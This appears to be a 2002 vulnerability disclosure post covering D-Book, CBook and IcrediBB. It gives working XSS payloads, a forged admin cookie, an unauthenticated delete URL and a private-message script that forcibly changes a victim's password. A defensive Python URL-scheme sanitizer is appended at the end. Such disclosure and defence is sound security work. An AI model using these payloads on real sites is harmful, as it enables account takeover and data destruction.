Security holes : D-Book, CBook, IcrediBB

From: frog frog (leseulfrog@hotmail.com)
Date: 04/12/02


Date: 12 Apr 2002 12:09:53 -0000
From: frog frog <leseulfrog@hotmail.com>
To: vuln-dev@securityfocus.com



Product 1 :
D-Book
http://www.smartbb.net

Versions :
1.4 (and earlier ?)

Problems :
- XSS
- Admin access

Exploits :
- [img=javascript:alert(%27hum%27)]
- Cookie "logged,anyvalue" on admin.php

More details in french :
http://www.ifrance.com/kitetoua/tuto/D-Book.txt

translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FD-Book.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools

****************************************
Product 2 :
CBook

Versions :
1.0.1 beta

Problems :
- XSS
- Access to an admin function (delete all entries)

Exploits :
- <script>ANYSCRIPT</script> on profile
- http://www.site.com/index.php?Change=2

More details in french :
http://www.ifrance.com/kitetoua/tuto/Cbook.txt

translated by google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FCbook.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools

***********************************************
Product 3:
IcrediBB Bulletin Board System
http://www.icredibb.com

Versions :
1.1 beta

Problems :
- Access to users/admins account
- XSS

Exploits :
- To change password, in a private message :
<sc*ript>
window.open('usercp.php?function=changepass&newpassword=PASS&passverify=PASS&submitnewpass=Submit');
window.open('usercp.php?function=changepass&newpassword=PASS&passverify=PASS&submitnewpass=Submit');
window.open('usercp.php?function=changepass&newpassword=PASS&passverify=PASS&submitnewpass=Submit');
window.open('index.php?function=logout');
window.open('usercp.php?function=changepass&newpassword=PASS&passverify=PASS&submitnewpass=Submit');
</s*cript>
(without '*')

- In subject (private message) :
<script>ANYSCRIPT</script>

- In webbrowser :

/pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=
javascript:alert('hello')
&message=MESSAGE&submitpm=Submit PM

/pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=
javascript:window.open('http:%2F%2Fwww.url.com')
&message=MESSAGE&submitpm=Submit PM

/pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=
javascript:a='http:%2F%2Fwww.url.com'%3Bwindow.open(a)%3B
&message=MESSAGE&submitpm=Submit PM

- In /usercp.php?function=avataroptions :
javascript:alert(%27HeLLo%27)

More details in french :
http://www.ifrance.com/kitetoua/tuto/icrediBB.txt

translated by google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FicrediBB.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools

**************************************************

frog-m@n
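All three reports share one root cause: a user-supplied URL (the [img=...] BBCode in D-Book, the images= and avatar fields in IcrediBB) is written into the page without checking its scheme, so a javascript: URL runs in the victim's browser. The following is an added Python example, not code from the post or from any of the three products, showing the check a board should apply before rendering such a URL: percent-decode and strip the characters browsers ignore, then allow only http/https. The [img=URL] tag syntax and the render_message() helper are assumed for illustration.

```python
import html
import re
from typing import Optional
from urllib.parse import unquote, urlsplit

# Only these schemes may appear in a user-supplied image URL; anything
# else (javascript:, data:, vbscript:, relative paths) is rejected outright.
ALLOWED_SCHEMES = {"http", "https"}

# Hypothetical BBCode form, matching the [img=URL] syntax quoted in the post.
_IMG_TAG = re.compile(r"\[img=(.*?)\]", re.IGNORECASE | re.DOTALL)


def safe_image_url(raw: str) -> Optional[str]:
    """Return the URL if it is a plain http(s) URL, otherwise None."""
    # Browsers drop tabs/newlines inside a URL and trim surrounding space,
    # so "java\tscript:" still runs as javascript: unless we drop them too.
    clean = re.sub(r"[\t\n\r]", "", raw.strip())
    # Fully percent-decode a copy so "%6Aavascript:" or a double-encoded
    # payload cannot hide the scheme from the check below.
    probe = clean
    while (decoded := unquote(probe)) != probe:
        probe = decoded
    for candidate in (clean, probe):
        parts = urlsplit(candidate)          # urlsplit lowercases the scheme
        if parts.scheme not in ALLOWED_SCHEMES or not parts.netloc:
            return None
    return clean


def render_message(text: str) -> str:
    """HTML-escape a message body and expand [img=URL] only for URLs that
    pass safe_image_url(); rejected tags are shown as literal text."""
    out, pos = [], 0
    for m in _IMG_TAG.finditer(text):
        out.append(html.escape(text[pos:m.start()]))
        url = safe_image_url(m.group(1))
        if url is None:
            out.append(html.escape(m.group(0)))        # never becomes markup
        else:
            out.append('<img src="%s" alt="">' % html.escape(url, quote=True))
        pos = m.end()
    out.append(html.escape(text[pos:]))
    return "".join(out)


if __name__ == "__main__":
    # Constructed inputs modelled on the payloads quoted in the post.
    for u in ("http://www.example.com/a.png", "javascript:alert(%27hum%27)",
              " JaVa\tScRiPt:alert(1)", "%6Aavascript:alert(1)"):
        print(repr(u), "->", safe_image_url(u))
```

The same check belongs on the avatar URL and the images= parameter: reject the value server-side rather than trying to strip "javascript" out of it, since the encoded and case-varied forms in the post show why blacklisting fails.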


